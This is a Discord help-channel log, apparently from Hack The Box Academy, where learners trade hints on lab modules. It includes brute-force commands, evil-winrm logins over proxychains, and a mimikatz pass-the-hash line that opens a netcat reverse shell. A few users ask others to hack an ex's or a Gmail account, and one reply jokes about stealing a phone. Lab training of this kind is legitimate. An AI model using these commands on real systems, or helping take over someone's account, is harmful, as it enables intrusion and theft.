#modules

having a 'bible' is not a bad thing

Threader3000 is a really good quick scanner for ports

Gets the ones in higher places too

guys how to download kali linux

On the firewall ips/ids evasion medium lab, i think it wants me to use netcat to bypass it. But it’s not letting me use source port as a command in netcat. Ideas?

Ask Google

are you joking

No lol

It takes all of half a second for Google to pull up the results

k

https://www.kali.org/get-kali/#kali-platforms

Indeed I do like that, I take notes at the same time as I learn and I practice on an easy machine, but my fear is to have too much information and not knowing where to find the information, I think that over time I will delete some information and clean up my notes, but it's always terrifying to delve into this amount of information, practice will free me from this fear! thanks to you

HI, i am currently stuck at the question Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host,

AD Enumeration & Attacks - Skills Assessment Part II

can anyonne helpme out?

i have found the || mssqlsvc|| account name and password and administrator hash but have failed to log on to ms01 with pth (for the admin account) or just plain old evil-winrm using the ||mssqlsvc||

Which question number is that?

8

I used ||chisel|| with ||proxychains|| and ||evil-winrm||, and just passed the ||service account and its hash|| and it worked fine.

so you proxychained the sql01?

cansomeone pls help hack soething?

something pls

Been awhile, so I can't remember the specifics:
||proxychains evil-winrm -i 172.16.7.50 ....||

#wolfiej can you help e with something pls?

?

can you accept my riend reqiest

No.

request

why?

Because I don't know you. If you've got a question regarding modules, put the module, chapter, and question in here, and explain what you don't understand.

k

bruh

Someone didn’t read the rules

wdym?

@pine daggeryeah it didnt work, idk why i would need to proxychain it

<@&861185840277487616>

like if im on the same network it should work right

through a computer or not

I wasn't. I was chaining through the target host.

and it worked for me... sooo no idea why its not for you

@pine dagger can you tell me witch rule did I brake?

Rule 3

how did I brake that?????

You’re asking to break into a gmail account. That’s not legal

<@&861185840277487616>

then waht do you do pls tell me?

@pine dagger

then waht do you do pls tell me?

bruh...

hmm

Not nice

Wow...

Saw that coming

https://tenor.com/view/fast-and-furious-gif-9504305

Hrmm?

Which user and hash are you using to login?

pls share a screenshot if possible and blur out sensitive things

can you tell me what do you do then

no

actually, go and look anywhere but here

si is this not even a fucking hacker sever?

It's been a while since I did this and I don't think you use a password to login as mssqlsvc

ok ill use the hash

You have everything you need

Probably delete hashes and passwords… even obscured ones 🙂

thanks

Hope you get it!

yep just got a shell its been approximately 5 hours im stuck on this

AD Enum is a tough module

yeah

it really is

Never saw a skid tell on themselves before... crazy

what is the time of the servers?

https://academy.hackthebox.com/module/80/section/779 - Broken Authentication - Predictable Reset Token

I think I made the script right but I think the problem is the time.

Have to brute force it iirc

can I dm u?

my script is fine I think

the only problem I think is the machines uses different times

or well maybe the problem is python which doesn't let me use md5 hashing without encoding first

Not sure why you're using an input for your time. Just use the time from the machine:
||from time import time current_time = int(time()) * 1000||
Then you can change the start and end time by + and minusing from that. You can simplify your code as well:
||for i in range(start_time, end_time + 1): md5_token = md5((username + str(i)).encode()).hexdigest()||

because I am using this time

You dont need that time

from: 234952 to 234954

You can use your attacker machine time.

Huh?

Thats not a time

wdym

You need to use linux epoch

ah lol

-.-

Quite stuck on this module and could use a hand:
https://academy.hackthebox.com/module/147/section/1356

I'm currently trying to ||mount a .vhd file|| and seem to be getting stuck on this line: ||Enter key or passphrase ("/dev/sda2"): which leads to (cryptsetup exited with status 2: No key available with this passphrase. (0))||

I'm not sure how to find this password, or if I'm misinterpreting things.

Feel free to DM me 🙏

I think thats the main issue you're having. With using linux epoch, you should be able to get the rest of it working. Just remember to provide a certain amount of msec from start to end.

Look at some of the John modules, i.e. zip2john. You should find it.

I found ||bitlocker2john|| but it doesn't seem to be working as expected. Thought maybe I was down the wrong rabbit hole. I'll double check my syntax though, thanks 🤔

Try the ||mutated list you made before||

You need to use John after you've got the hashes from that tool

As per usual, spent a mountain of time pulling my hard out over a missing flag (||bitlocker2john -i <file> instead of just bitlocker2john <file> killed me||) 😂 Thanks for reaffirming.

looool

TYPICAL.

Next steps are going to be learning how to unmount all of the partitions I accidentally mounted in this process 😂

am gonna try with this

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

Thanks! I'll give it a read 🎉

Id have python also do the HTTP connection, etc. Possibly double your min/max range.

Can i please get some help?

I had done the script in 3 languages to try -.-

You're probably overthinking this one. The example shows you how to do it. ||But you need to use a different method. If you look at the source code, there's only two actions you can really do. Buy, or Redeem. Only one of them has a race condition though.|| I'd recommend I would do more sessions than they do 🙂

Metasplit should work. Make sure you specify the vhost.

HOLY #$*$ finally got the flag on the Attacking Common Services Hard module. Alot of research on correct exec commands and alot of ChatGPT. syntax corrections. Quite proud of myself right now. The part that kept confusing me ||was the way 'create a linked server' from one of the txt files is worded.|| I Had to really think about that.

I'm trying to work with the one that hasn't been locked but just cant get anything to work... got there, was over thinking it!

Flag captured, disks unmounted, life is good. Thanks again for your help 👍

Yeah I was as well. Couldn't believe it was that simple when I got it.

<@&861185840277487616>

@west night
Can I DM you???

hi i'm stuck in module password attack section attacking sam

Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer.

• try xfreerdp with bob user, access denied
• try smbclient share ADMIN$ but reg.exe: command not found

You should be able to use RDP. Double check to make sure you're putting password in single quotes or escaping certain special characters

xfreerdp /u:bob /p:'P@ssw0rd!' /v:10.10.10.10

i'm sure use correct password, but bob user don't have access

Does the bob user have rights to save a file into the root of C:?

Also, did you "run as administrator" CMD?

FWIW that command works for me, so you may want to verify you ran the command prompt as an administrator.

just try use run as administrator and it work, cool
thanks @wispy aspen

anyone can help on ATTACKING COMMON APPLICATIONS - Other Notable Applications assessment?

I found the application which is vulnerable.

I got the exploit from exploit DB, and managed to test for Code Execution. But no matter what rev shell codes, i used. it still cannot work.

I know msf exploit can work, and tried it. Just wanna figure out why my rev shell payload is not working.

can i ask someone about type juggling in whitebox attacks

I have in my notes that I used ||48320.py|| Is that what you've been using?

nope, i am using ||48971||, i'll try using ||48320.py|| thanks!

What is the actual name of the secion and module?

Authentication Bypass - Type Juggling in Whitebox Attacks module

Is that in the CBBH exam?

No, the Whitebox Attacks Module
https://academy.hackthebox.com/module/details/205

Maybe @wild dragon or @pine dagger can help you

@hidden trellis I sent you the guide for it

I am really stuck at this question. Please help me!
Tried everything from forums, etc. Not able to get the password for the 'sam' user and hence the flag. 😭

Module
Password attack: Password mutation

I tried ftp: access denied
smb shares: found nothing
and ssh: .........................

how ? all ftp login says wrong password

@short hare

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

sed '1,17000d' mut_password.list > mut_password1.list

following this!

using it to to crack sam's password!

mut_password1.list

ok let me give it a try

???

thank you, friend!

How long it will take?

m using ..

hydra -t 4 -L user.txt -P mut_password1.list ssh://<ip>

and in user.txt gave 'sam' only as the user

you should crack FTP!

2 commands above --> creating muta password list!
using the muta password list to crack FTP with user is sam

Thanks got the flag

I'm not really familiar with mounting vhd files in linux I was following this page and somehow I'm getting this error

https://itsfoss.com/mount-encrypted-windows-partition-linux/

sudo dislocker /dev/loop0p2 -upassord -- /media/bitlocker
Sun Aug 13 09:11:47 2023 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort.
Sun Aug 13 09:11:47 2023 [CRITICAL] Unable to grab VMK or FVEK. Abort.

Feels like crying...!

Hey how the 2nd command sprouted on your mind? Just wondering

hi im doing my first linux module and im stuck on "Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer." and cant find the answer anywhere help!!

@compact jacinth you should tell everyone what is your section & module!

hello @short hare seems as we are working on the same module can i PM you for some inquiries ?

yea

hello @slender shoal can i also PM you for some inquiries ?

Got it....
I wonder how htb expects this much depth! 😆

ok!

deleting the first 17000 lines is not an expectation from HTB, but a recommendation here in Discord

Will take a note in attempting future questions

this command from the "Service and Process Management" Section is helpful for you!
rememeber that you should filter the snapd service with

<command_from_the_section> | grep snapd

Hi there, I'm trying to solve the Password Attacks Lab - Hard :

Found a smb share /david/Backup.vhd and I'm trying to mount it for too long now, I haven't done this before any help on below error?
I'm not sure what's the key for /dev/sda2?

guestmount --add /mnt/david/Backup.vhd --inspector --ro /mnt/vhd
Enter key or passphrase ("/dev/sda2"):
guestmount: could not find key to open LUKS encrypted /dev/sda2.

Try using --key on the command line.

Original error: cryptsetup_open: cryptsetup exited with status 2: No key available with this passphrase. (0)

https://itsfoss.com/mount-encrypted-windows-partition-linux/

I was trying this and got an error, I don't recall it now as my lap time was up, I will redo these steps again

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

Yes yes I have seen all these medium pages from other guys asking the same question I'm trying it all over again

We have no clue what you have and haven't seen /shrug

what does this mean?
Sun Aug 13 10:54:11 2023 [CRITICAL] None of the provided decryption mean is decrypting the keys. Abort.
Sun Aug 13 10:54:11 2023 [CRITICAL] Unable to grab VMK or FVEK. Abort.

None of the **provided decryption** mean is **decrypting** the keys.

here I was trying

the key im typing is incorrect?

I'm using the same password for david, as I'm assuming it should open me this vhd file as it's shared on his name, right?

I would suspect that the tool you are using (guestmount) doesnt support mounting bitlocker encrypted drives

And no david's password doesn't work

Because that would be too easy for a Hard Skill Assessment 🙂

wow, because I saw some people after successfully mounting the file there are more steps with sam files etc, okay!
But any hint where else to search for this password then? I have two more passwords from the file "login.kdbx"i found on johanna machine.

Try looking at what ||John|| can do.

And not the specific program

I thought of something like vhd2john but no script

Try re-reading the module https://academy.hackthebox.com/module/147/section/1323

wow It's exactly there thanks, lemme dig more then thank you!

Almost like they are testing you with the skill assessment on things you were taught...

Yeah only if I could recall this :(((( I was struggling with the mounting and reached several times to this key pass thing, found out, I'm using wrong key. I hope I will manage to crack in.

That's why I put my content into OneNote. Made it all searchable 🙂

download obisidan

When in Windows **Privilege Escalation > Print Operators ** I can't figure out what to do when it says compile with Visual Studio 2019 (cl.exe). It isnt recognized and the user path doesnt exist...

Any Ideas? 🙏

what error are you getting

Yeah definitely, I finished the module thankfully, I will also make notes for this module what platform do you recommend. I know medium and Notion, open for your suggestions

Obsidian I think is the defacto. OneNote, is also decent.

Check C:\Tools
I think, all what you need is there

One question if we need to write http 127.0.0.1 9050 in the proxychains.conf in order to make rpivot work, why we call it SOCKS when in reality is HTTP???

Not sure what you mean. It's a socks proxy.

Sorry If we are not using socks type conexion, why we still call it socks? I mean we have to configure proxychain with http, not with SOCKS, still we call it socks proxy?

Sorry I am new on this, this thing just makes me feel confused

You should be doing it as socks

it doesn't work for me

tried with socks4 127.0.0.1 9050 and socks5 127.0.0.1 9050 and then proxychains firefox-esr IP:80

Just giving me page not found

I modified with http 127.0.0.1 9050 and worked perfectly

But I think that it is still using SOCKS protocol even in the configuration we put http that is the reason I supose that htb still name it SOCKS proxy ...

Even though the module suggests using proxychains like that, you really shouldn't do it that way, and it probably is what is giving you issues

use something like foxyproxy

oki I tried to add

Instead of piping literally everything through proxychains, it's an extension that will allow you to quickly just turn socks proxies on/off.

I mean I tried to add one proxy to foxyproxy

COuld I dm you?

ok done easier with foxyproxy

but still I dont understand why if socks5 support http it doesnt work

thx restie probably this is going to solve my doubt about the excercise... i..ot

#modules message

Obsidian

Not necessarily. Some machines block pings.

Hi everyone, need some help in the shells & payloads module live engagement
Tried multiple things but everytime not able to get a shell

Guys is the bug bounty hunter module a guarantee way to like master it if i study it a lot

There a question in Linux fundamentals

Which kernel version is installed on the system?(Format:1.22.3)

I tried uname -v

But the answer does not match

Idk why I'm not allowed to send photos here

The + is disabled

I'll try from pc

I think so

read #welcome and #rules after that use /verify at #bot-commands to send ascreenshot here

Is that for Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt

guys how to download kali linux

https://www.kali.org/get-kali/#kali-platforms

ATTACKING COMMON SERVICES - Attacking SMB
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.

I got the password; whenever i want to SSH it gives me: jason@10.129.72.27: Permission denied (publickey).

Tried some things but didn't get my where i needed to be. Any nudge, anyone?

I'm stuck on AD Skill Assessment part II. I only need 2 more flags. Could use a hint or two if anyone here has finished the AD module

try using that password to access other services and think how to access via ssh without password

Hello, i have i problem with Suricata Rule Development Part 1 question, the question is In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert? I don't understand how to find the minimum offset value. I would be glad if some1 could explain this to me.

Play around with the value of "offset:X" such that when u run the command suricata -r /path/to/pcap an alert is triggered

Yea, i got it, thk

Attacking Common Services - Easy, Ive found the username ||fiona@inlanefreight.htb|| but it wont get bruteforced

Capital F

With or without inlanefreight?

Without

ah ok

one sec. I'll do the machine again and help you

My apologies. If you're bruteforcing SMTP you will need the domain. And also, I checked my notes an I was mistaken about the capital F.

Ah ok

But it doesnt work

rockyou

Ah thx

also, i used this command that's in cheatsheet hydra -L users.txt -p 'Company01!' -f 10.10.110.20 smtp

ncrack with users and 200 most used worked for me per my notes.

he wants the password

I got the password for the user

another hint for later, 0 = cmd

Question ||IMAP and POP3 isnt running on the host, so how am i supposed to access the mail xd||

did you know that microsoft have their own sql server?

and you can access webpages using ip's

wdym

how would that help?

man, look at ports

I know

but, sometimes the sections cover something and the skill assessments cover something completely different

read the sql section about microsoft and go to its webpage

aaaaaaaaa

don't worry. the medium machine will be simple

In Footprinting/imap & pop3...

I've found the flag in imap, but when submitting it as an answer it gets rejected. There aren't any other flags requested in this module, so I'm not sure what I'm doing wrong

you need to find both

one for pop3 and the other for imap

Oh, I missed a question. There are two flags for imap

Are you sure there's one for pop3? Both questions say imap. Maybe that's an error?

yes

there are two flags

Yeah, but the questions both say imap though

it must be a mistake

Hello, need help on Academy module - Footprinting Lab - Medium, I have an error when I try to connect to SQL server

@fathom stump if you want the credentials for imap, read the section again

I've found the flag in the imap emails

It's the one that says "enumerate imap and submit the flag" that I can't find

pop3 has no emails on it for the given user

@dusky rivet use your machine

You're telling me I can't connect to the DB with remmina? bruuh

@dusky rivet did you know that you can open a database as administrator?

and use that to authenticate

rdp and you can find the password in the machine

Not sure to understand, context: I used the pwnbox to log in though rdp with the user Alex. Now I have to get the password in the DB in MSSQL, I found creds to get it. But I can't use them with the GUI

you can

huh

right click and open as

yup

but Alex isn't Admin

I know

but you have the password

that are in the a user machine

and I don't know the administrator's password, I've already completely pwned (via metasploit) the machine so I can change the admin password but it was unexpected

aaah, run as alex, or the famous second account?

The password you found works for admin

yup, but french keyborad didn't worked for the special carac "@" I used a virtual keyboard, all is finne now thanks!

Just copy and paste

Got both flags, they are both in imap @rustic sage

Just need to find the admin email now

not working, I tried it. Prob cause of remmina

go to the forum, they'll give you the command

guys how to download kali linux

You were told to Google yesterday, kali has plenty of documentation and downloads based on what you need/want it for

Youtube has many guides for that

Multiple people have already answered you, two of which sent you the link...

Hi 👋 do you know some youtuber I can learn hack from it

Or website

ippsec

`rogram 'inveighg.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1

• .\inveigh.exe

At line:1 char:1

• .\inveigh.exe

•   + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed`

can someone help me please?

inveighg.exe' this is your error

im at skill assesment 2 of the ad module question 9

thats the file name

`Program 'inveigh.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1

• .\inveigh.exe

At line:1 char:1

• .\inveigh.exe

•   + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
  

`

ive seen its a problem with x64 or x86

but ive treid both versions and it still doesnt work

mimikatz the same problem

Are you transferring these to the machine, or using the one on the box?

transferring

I'd check the file hash, to make sure that they aren't getting corrupted in transit. If so, try a different method.

ok

where can i find inveigh in the attack box>

ive tried locate

If it's not in C:\Tools\, you will have to transfer it

is invoke webrequest a good file transfer method?

its what ive ben using

even powerview was giving me errors

Are you using UDP for VPN? Might give you some issues.

yes i am

cuz ive checked the hashes and theyre completely different

great

Yeah, definitely corrupting in transit, then. I'd try TCP VPN first, and if that doesn't work, some other transfer method.

which ones are the most reliable?

pyhton3 -m http.server and invoke web request dont seem to be that great haha

ill try doing smb server or something like that

The python method has always worked fine for me.

Attacking Common Services - Easy, ive got the credentials and ive tried to connect to the IP using telnet, i successfully authenticated, but how am I supposed to retrieve the mails? Ive been stuck on this for a while now

None of these work

yep ive done a smbserver.py from my own computer to the attack host then just a simple http.server to Invoke-WebRequest and it worked

idk why the other way didnt

is Inveigh just a beefed up responder?

I was curious, so I googled. Top result:
"Regardless of how Inveigh is described though, if you have used Responder, Inveigh's functionality will be easy to understand. The main difference being that where Responder is the go to tool for performing LLMNR/NBNS spoofing attacks, Inveigh is more for PowerShell based Windows post-exploitation use cases."
Take that how you will.

ah

thanks

If you're logged in with the user account you found, you should be able to ||create a file on the server, and then use that as a webshell||.

Ah

Nvm, I found something

can someone help me understand winrm?

Ask the question

And someone may respond

Don't ask to ask 😄

https://dontasktoask.com/

so ive been trying out win rm to dc01 with the credentialls for the last user in the skill assesment, because logically, if i got the hash from that ip i should be able to connect to it right? so ive done that with smb but when i try to do anything else tahn with smb, nothing works. win rm, smbexec, psexec, rdp, whatever.

im redoing a full port scan on it to see if theres like a hidden port or something

You're referring to AD Enum right? Which chapter/question?

skill assesment 2 Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

try revshells

Ah Right. WinRM with username and password worked fine for me with evil-winrm to DC01 through my proxychain

pass it the param?

?cmd=id

as an example

Nothing, but I think I know why, its because I changed the shells thing from " to ' so i can have it in ""

but I cant upload the shell if I dont change them lol

|| evil-winrm -u CT059 -p c***** -i 172.16.7.3 ||am i just super dumb?

Works for me

bruh

As said, I did it via proxychain though

but proxychained from your personal pc to the attack host right

yarrrr

ah

might be the initial target doesnt have a good version of evil-winrm

Still dosent work

You need single quotes around cmd, and double quotes around the php code, and I used single quotes on the OUTFILE.

i wear to god i hate win-rm `sudo proxychains evil-winrm -i 172.16.7.3 -u CT059 -p *****ProxyChains-3.1 (http://proxychains.sf.net)

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.7.3:5985-<><>-OK

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1`

Ah

I was stupid, its windows not linux, thats why ls didnt work xd

Doing Whitebox Pentesting 101: Command Injection: Skills Assessment and i believe I have found the vulnerability and to confirm it I used tcpdump to ping myself

@pine dagger can you dm your command?

but i don t know how to continue from there, any help i well appreciated !!

Hello guys , any tips for new people on htb

Sent over.

There's ||a certain file that you can access on the target machine. You can overwrite that file with whatever you want. i.e. output ls, or file contents.||

👍

Do you mean on HTB in general? Or on Academy?

this is from Blind verification section We can redirect the output of the command we executed with ">" to /var/www/html/output.txt, and then attempt visiting this page on the server. Though this may be a good way to eventually retrieve output, it may not be very good to verify command execution, as there are many ways this could fail without us knowing.

the question is what to write to a file, if i don't k ow what it is, and How to search for it ???

If you've worked out how to perform the command injection, and can send commands, you're pretty much done. The file in question is a key file you use to get started... 🙂

I have never tried it before, will give it a try, thanks a lot

sorry if I am being rude, but can you please rephrase it again ?

Which part? If it’s the file… let me ask this… where did you get the code? 😉

Htb general

well that's depend on ur background

i think i have a mistake, the ping request worked because i was running a local server and any cURL to this local server will eventually lead to a ping request

Can someone hack my exes discord

i have tried "package-lock.json" and "style.css" but that didn't work, perhaps one of them is the right file but i did something wrong with my command

🙏

ok I think i got, i will try

wrong place

You may want to read the rules. I.e. rule 3. Asking people to do that is most definitely not legal.

https://notes.huskyhacks.dev/blog/how-to-hack-your-exs-social-media-accounts-real-guide

just steal her phone duh

or connect to her wifi you probably had the password of

I'm doing the Splunk module (https://academy.hackthebox.com/module/218/section/2356), and I'm maybe misunderstanding the phrasing of this (or the actual meaning behind the eventid):
find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes
4624 is successful logins - 4625 is failed. I read an attempt, as a failure - am I misunderstanding it, or ?

Im having the same issue, no problem reaching other boxes but Timelapse doesn't show any open port, anyone else?

I understand the question to ask you to count the number of logins within 10 minutes.
Which user has the most logins within such a 10 minute slot?

See, I guess that's the second part, it says account and not user - so I would expect the result (if my query is correct) to be a computer account

hello

Hello everyone.
How can i use the bon key provided in interactive section in order to interacte with the target on my own machine??
Someone to help me please

i'm broke, any free training academies for cybersecurity?

Did you solve this? :)

Yup, gotta go look at my notes for a hint—not at computer rn

Oh, you mind me sharing what I'm doing (Which is wrong) for some feedback - whenever time suits you ?

Ya sure

can anyone direct me to any course on htb that helps with rpc? I keep landing on boxes that has some of these open, and I never know how to approach them.

Hi , i'm doing the WINDOWS EVENT LOGS & FINDING EVIL module (https://academy.hackthebox.com/module/216/section/2303) , and i cant seem to understand the question : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe . Can anybody give me a hint ?

have you done that??

Submit the contents of the flag.txt file on the Administrator desktop on MS01

https://academy.hackthebox.com/module/80/section/782 Broken Authentication - Brute Forcing Cookies - 2nd question

someone could give me a hint please

Is there a general channel

yes, once you verify your Discord account with a token from your user profile

does anybody know why kerbrute tool (AD Enum&Attacks module) doesn't save output to the file when specified? Tried -o/--output and it only creates the empty file. Same with existing file - writing to it doesn't do anything

It worked yesterday, though

Module: Attacking Common Services
Attacking SQL Databases

Hello, I have issues for the first question : What is the password for the "mssqlsvc" user?
When I launch
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
I got the return name and under it nothing.
I saw that the user sa exist but when I try to use it, it say that it doesnt exist or that i dont have permission
I am working with mssqlclient.py
thx

yes

Did you solve this task with range()?
If so, would you show me your solution? Gladly by DM.
I have answered the question, but not with the way the author intended.

I can't get it to work with range().

I believe i used time bin … ill be back at the computer later and can dm

No problem, I am no longer at the PC today.
Tomorrow I will take care of this task again.
I want to find a way to narrow down the results more.

What if I don't have a HTB account

You use proxychains??

Or other method like create new user to login with rdp

Nah I just used the hash that I got (NTLM) and winrm

Thanks

Then you can create one. 🤷‍♂️

Payload Bunny. You got some nerve ordering me around

I am not commanding you at all.
I am showing you a solution.

U come in here with ur fluffy ears and claim to have a "solution" to everything that goes on

Did u consider that I'm NOT SURE if I want to create an account

Without verifying your account, you will not have access to many channels.

Thats strike 2

strike 2 like managing a child lmaooo

why after doing pass the hash with mimikatz command specified in /run is still getting run as my current user, not the one i have passed hash? sekurlsa::pth /user:julio /rc4:811c7040a32423b74b14043a9f76cd0 /domain:. /run:"C:\tools\nc.exe 10.129.1.6 9876 -e cmd.exe"?

Do u have an account

yes

how do you get academy role

Traitor

then you can't join the rest of the discord

it's a rule we had to enforce due to spammers and kids who were up past their bedtime

If you have the Silver Year subscription, you get this role

ah ok

I just have one question

Does HTB have boxes or material for reverse engineering

Some I believe

Is HTB going to drop a SOC Analyst Cert?

I mean... they've got the job role lined up... my guess is yes, but it's just a guess

Yes

Ya ok—i saw that and was like wait a sec

Your guess was leaked a couple of days ago

time to re-new

any help pls 😢

Try ||responder||

I am waiting for HTB to announce the entire path.
I still have a lot to learn....
So I know what all is coming up.

yoooo

I use ||responder||, but since i have no "sa" that appears i m stuck

@acoustic owl I've decided to create an account

Wtf someone used my email ..... ????

You do not need sa

This is a weird interaction but if it's tied to your email, and you have access to your email, then recover the account?

Yes I just recovered it

Only the support can help you with this. (Green Buuble)

How do I connect it to discord

#welcome

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Footprinting/SNMP

I'm guessing there's a specific word list to use with onesixtyone that isn't in the seclists/snmp folder? No hits with anything there.

hello all i really need your guys help

module: Skills Assessment - Using Web Proxies

question 3

all the results are showing 404

So I've been at this for quite some time and I'm pretty stumped. A seemingly straightforward problem: “What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.” But I’m stuck and the hint is garbage. “Get-WinEvent can show us the specific records and how many there are right?”
Located in INTRODUCTION TO WINDOWS COMMAND LINE Skills assessment last question question. For those who want to login you'll need this: user10 & vmtoolsd.exe (password)
Normally I would figure this out myself but I’ve been at this for 4 hours and the closest I can get is using:

Get-WinEvent -FilterHashtable @{ProviderName = ‘Microsoft-Windows-Security-Auditing’ LogName = ‘Security’ Id = 4625} | Select-Object -ExpandProperty Message

In desperation I also tried dumping the list of ActiveDirectory users with:

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName
And trying each as an answer which still hasn’t gotten me the answer.
Please help!!

rt command should be what your looking for

I'm doing the Pivoting module, RDP and Socks Tunnelling with SocksOverRDP. I have started the SocksOverRDP dll and Ran the server thing on the first host, setup Proxifier and added the Proxy server. When I try to connect from the initial foothold to the target with RDP I get the following error. Anything else I can do from my end to fix this?

What Is DC IP?

Probably shorthand for saying the domain controller’s IP address

Thanks

i am going to dm you my solution

https://academy.hackthebox.com/module/80/section/848 Broken Authentication - skills assessment

I need a nudge please

A bit stuck on the last question under Attacking common services - Attacking SQL Databases. I've got the mssqlsvc and logged in via mssqlclient.py, but I'm not sure what commands to run. I'm at lost when it comes to SQL syntaxes etc.

Check the cheat sheet. From my notes, if you are in sql with un/pw, you should just need those commands.

xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Is the comma in here an error? The command is not working. I changed the IP, the username, and the password for the exercises. I also changed the file path to home/kali/test.txt

[ERROR][com.winpr.commandline] - Failed at index 4 [/drive:linux,home/kali/tester.txt]: PostFilter rule could not be applied

that's the error I got

Okay, nevermind, it's working now

You have to have an RDP session already running before you log in for the tsclient

I am working through the DNS Enumeration Using Python module.

I added the IP for inlanefreight.htb to my hosts file. My question is, I can dig a record for inlanefreight.com. When I use dig against inlanefreight.htb, I have to input @<IP> following.

Why do I have to @ the target IP if I added the domain name and IP to my hosts file?

Hi, All Session Security Skills Assessment, Can someone help

Hi there, working on "Intro to AD Enumeration" module, page "skills assessment 2". Stuck on Q8 - Getting Admin access to MS01, if anyone can msg me or provide any hints I'd be eternally grateful. Thanks

DM

sure what's the issue?

sure shoot me a dm if you still need help

htb is not an official TLD. So the root servers cannot resolve it. You must therefore specify the name server that knows this zone.

You can either use an IP for this, or a domain. But the domain must be resolved to an IP before resolving your dig request. So it doesn't really make sense to specify a domain as name server.

tr 'A-Za-z' 'N-ZA-Mn-za-m' < encrypted_file.txt > decrypted_file.txt

Or just use cyberchef

Are you using the provided wordlists?

Can I please have some guidance on Keeper?

Question on "Attacking Common Services - Medium",|| ive enumerated the target and I cant get a foothold, ive tried enumerating the DNS server, found nothing. Tried to connect to the FTP services and I wasn't able to, should I start bruteforcing the services now? I see no other way||

I get connection refused when I try connecting to FTP

bruh hint enum ||highest ports||

prehaps run with more nmap flags and see what you get?

You have an unknow service
What exactly is it? Try to find out what it is

I know what it is

But it dosent work lol

what about the other one

Try it without username. Not every server accepts a username this way

Doesnt work

-P? Did you read the man page?

look at your nmap scan, its staring you in the face

||aaa maybe using it as a proxy lmao for 30021||

try without the -P

if you have an unknown service how can you tell nmap to find more info about what is running?

Wdym that shouldnt make a difference

https://linux.die.net/man/1/ftp

I just sent a screenshot of that scan, ive already got the information on it

a

I can't see that option in the man page

-p- does all ports

with nmap yes, but not with ftp

oh FTP, yeah -P can be used to specify the port number

No

Read the man page
https://linux.die.net/man/1/ftp

ah my bad, its early in the morn

It says -P specifies the port in the man page

||And I tried using a proxy but it didnt work xd||

so if you are still trying this idea out then hint it's the wrong path

I am very lost, I have no clue what to do except brute forcing (But I know it should be the last thing one does so I wont do it just yet)

i'll help you in dm in a sec

For this reason I have linked you to the man page.
-P is wrong.

try it like this
ftp <ip> <port>

or this will help better 👆

I guess the box is just broken

if you saw the tmp screenshot i send then you should get what the right path for this assessment is and try the usually troubleshoot restart the box, try the pwnbox, change the vpn

ok

Huh the box wont work, ive switched VPN

of course the box that you have is on the old vpn restart the box to get a new one that are in our new vpn network

Now it works

Weird

(The -P option isnt wrong for my version)

hey guys, I'm stuck at the "Attacking Common Services" : "Attacking SQL Databases" at the Q : " What is the password for the "mssqlsvc" user? "
does some1 have a hint 4 me?

||Responder|| is your friend

hhmmmm, so I need 2 get a hash I understand...

I think I got it, thanx

I'm trying to solve the Heartbleed task in HTTPS/TLS ATTACKS , but i can't get the private keyw with the command given in the module text. I know it's not deterministic, but i ran it at least 20 times in a row now.. is that normal? should I continue trying or is something wrong_

nevermind - dont know if it was coincidence, but after restarting the machine i had it on the 2nd try.

do I need 2 access as "mssqlsvc" (the user I found his password)?! cause I can't...

For this Question?
What is the password for the "mssqlsvc" user? - No

For this Question?
